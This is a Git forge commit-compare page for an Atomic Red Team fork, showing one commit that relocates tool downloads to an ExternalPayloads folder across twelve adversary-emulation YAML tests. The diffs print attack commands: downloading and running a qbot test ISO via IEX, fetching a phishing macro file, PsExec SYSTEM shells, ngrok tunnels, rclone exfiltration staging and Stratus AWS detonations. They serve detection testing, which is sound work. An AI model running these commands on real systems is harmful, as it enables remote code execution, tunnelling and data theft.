adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: adam/atomic-red-team-gs:master
Branches Tags
adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093
...
pull from: adam/atomic-red-team-gs:external_payloads
Branches Tags
adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093

1 Commits
master ... external_payloads

Author SHA1 Message Date
Hare Sudhan 825d8a23e4 external payloads standardization 2025-12-13 20:42:28 -05:00
12 changed files with 51 additions and 44 deletions
Expand all files Collapse all files
atomics/T1048.003/T1048.003.yaml
+4 -3
View File
@@ -193,10 +193,11 @@ atomic_tests:
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
- description: 'Check if rclone zip exists'
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip"
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\
executor:
command: |-
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
atomics/T1057/T1057.yaml
+8 -8
View File
@@ -103,10 +103,10 @@ atomic_tests:
if (Test-Path "c:\Program Files\Process Hacker 2\#{processhacker_exe}") {exit 0} else {exit 1}
get_prereq_command: |-
Write-Host Downloading Process Hacker
New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "C:\Temp\ExternalPayloads\processhacker-2.39-setup.exe"
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://versaweb.dl.sourceforge.net/project/processhacker/processhacker2/processhacker-2.39-setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe"
Write-Host Installing Process Hacker
Start-Process "c:\Temp\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s"
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\processhacker-2.39-setup.exe" -Wait -ArgumentList "/s"
executor:
command: Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"
name: powershell
@@ -125,15 +125,15 @@ atomic_tests:
dependencies:
- description: PCHunter must be present in device
prereq_command: |
if (Get-ChildItem -Path C:\ -Include *PCHunter64* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1}
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}) {exit 0} else {exit 1}
get_prereq_command: |-
Write-Host Downloading PC Hunter
New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "C:\Temp\ExternalPayloads\PCHunter_free.zip"
Expand-Archive -LiteralPath 'C:\Temp\ExternalPayloads\PCHunter_free.zip' -DestinationPath C:\Temp\ExternalPayloads
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.snapfiles.com/directdl/PCHunter_free.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip"
Expand-Archive -LiteralPath 'PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free.zip' -DestinationPath PathToAtomicsFolder\..\ExternalPayloads
Write-Host Unzipping Installing Process Hunter
executor:
command: Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
command: Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"
name: powershell
elevation_required: true
- name: Launch Taskmgr from cmd to View running processes
atomics/T1059.004/T1059.004.yaml
+2 -2
View File
@@ -52,7 +52,7 @@ atomic_tests:
autosuid:
description: Path to the autosuid shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
default: PathToAtomicsFolder/../ExternalPayloads/AutoSUID.sh
autosuid_url:
description: Path to download autosuid shell script
type: url
@@ -82,7 +82,7 @@ atomic_tests:
linenum:
description: Path to the LinEnum shell script
type: path
default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
default: PathToAtomicsFolder/../ExternalPayloads/LinEnum.sh
linenum_url:
description: Path to download LinEnum shell script
type: url
atomics/T1204.003/T1204.003.yaml
+5 -4
View File
@@ -8,15 +8,16 @@ atomic_tests:
- windows
executor:
command: |-
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
$mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso")
Mount-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso"
$mountedpath = (Get-DiskImage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso" | Get-Volume).DriveLetter
$finalpath = $mountedpath + ":\"
cd $finalpath
.\calc.exe.lnk
cleanup_command: |-
start-sleep -s 5
stop-process -Name "Calculatorapp" -Force
dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
dismount-diskimage -ImagePath "PathToAtomicsFolder\..\ExternalPayloads\qbot-test.iso"
name: powershell
elevation_required: true
atomics/T1219/T1219.yaml
+3 -3
View File
@@ -333,10 +333,10 @@ atomic_tests:
if (Test-Path "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}") {exit 0} else {exit 1}
get_prereq_command: |-
Write-Host Downloading Splashtop Streamer
New-Item -Type Directory "C:\Temp\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "C:\Temp\ExternalPayloads\Splashtop.exe"
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.splashtop.com/win/Splashtop_Streamer_Win_INSTALLER_v3.6.4.1.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe"
Write-Host Installing Splashtop Streamer
Start-Process "c:\Temp\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s"
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\Splashtop.exe" -Wait -ArgumentList "/s"
executor:
command: |-
Start-Process -FilePath "C:Program Files (x86)\Splashtop\Splashtop Remote\Server\#{srserver_exe}"
atomics/T1222.001/T1222.001.yaml
+3 -3
View File
@@ -158,9 +158,9 @@ atomic_tests:
prereq_command: |
if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null
Invoke-WebRequest #{SubInAclDownloadPath} -OutFile PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi
msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\SubInAcl.msi" /qn
executor:
command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
name: command_prompt
atomics/T1552/T1552.yaml
+2 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1552/src
default: $PathToAtomicsFolder/../ExternalPayloads
aws_region:
description: AWS region to detonate
type: string
@@ -25,6 +25,7 @@ atomic_tests:
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p #{stratus_path}
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
atomics/T1562.008/T1562.008.yaml
+6 -3
View File
@@ -173,7 +173,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/../ExternalPayloads
aws_region:
description: AWS region to detonate
type: string
@@ -185,6 +185,7 @@ atomic_tests:
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p #{stratus_path}
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
@@ -228,7 +229,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/../ExternalPayloads
aws_region:
description: AWS region to detonate
type: string
@@ -240,6 +241,7 @@ atomic_tests:
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p #{stratus_path}
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
@@ -282,7 +284,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1562.008/src
default: $PathToAtomicsFolder/../ExternalPayloads
aws_region:
description: AWS region to detonate
type: string
@@ -294,6 +296,7 @@ atomic_tests:
prereq_command: |
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
get_prereq_command: |
mkdir -p #{stratus_path}
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
atomics/T1566.001/T1566.001.yaml
+3 -2
View File
@@ -12,10 +12,11 @@ atomic_tests:
command: |
$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null
Invoke-WebRequest -Uri $url -OutFile PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm
name: powershell
cleanup_command: |
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\PhishingAttachment.xlsm -ErrorAction Ignore
- name: Word spawned a command shell and used an IP address in the command line
auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f
atomics/T1569.002/T1569.002.yaml
+6 -7
View File
@@ -216,16 +216,15 @@ atomic_tests:
dependency_executor_name: powershell
dependencies:
- description: |
PsExec tool from Sysinternals must exist in the '\Users\Public\Temp\' directory
PsExec tool from Sysinternals must exist in the ExternalPayloads directory
prereq_command: |
if (Get-ChildItem -Path C:\ -Include *psexec* -File -Recurse -ErrorAction SilentlyContinue) {exit 0} else {exit 1}
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "C:\Users\Public\Temp\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\Users\Public\Temp\PSTools.zip"
Expand-Archive "C:\Users\Public\Temp\PsTools.zip" "C:\Users\Public\Temp\" -Force
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\" -Force
executor:
command: |-
cd C:\Users\Public\Temp\
.\PsExec.exe -i -s cmd -accepteula
PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe -i -s cmd -accepteula
name: powershell
elevation_required: true
atomics/T1572/T1572.yaml
+7 -7
View File
@@ -131,19 +131,19 @@ atomic_tests:
- description: |
Download ngrok
prereq_command: |
if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1}
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\ngrok) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads\ngrok -ItemType Directory -Force | Out-Null
Invoke-WebRequest #{download} -OutFile PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\ngrok
executor:
command: |
C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
Start-Job -ScriptBlock { PathToAtomicsFolder\..\ExternalPayloads\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
Start-Sleep -s 5
Stop-Job -Name Job1 | Out-Null
cleanup_command: |
Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ngrok -Recurse -ErrorAction Ignore
Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1580/T1580.yaml
+2 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
stratus_path:
description: Path of stratus binary
type: path
default: $PathToAtomicsFolder/T1580/src
default: $PathToAtomicsFolder/../ExternalPayloads
aws_region:
description: AWS region to detonate
type: string
@@ -25,6 +25,7 @@ atomic_tests:
prereq_command: |
if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi
get_prereq_command: |
mkdir -p #{stratus_path}
if [ "$(uname)" = "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/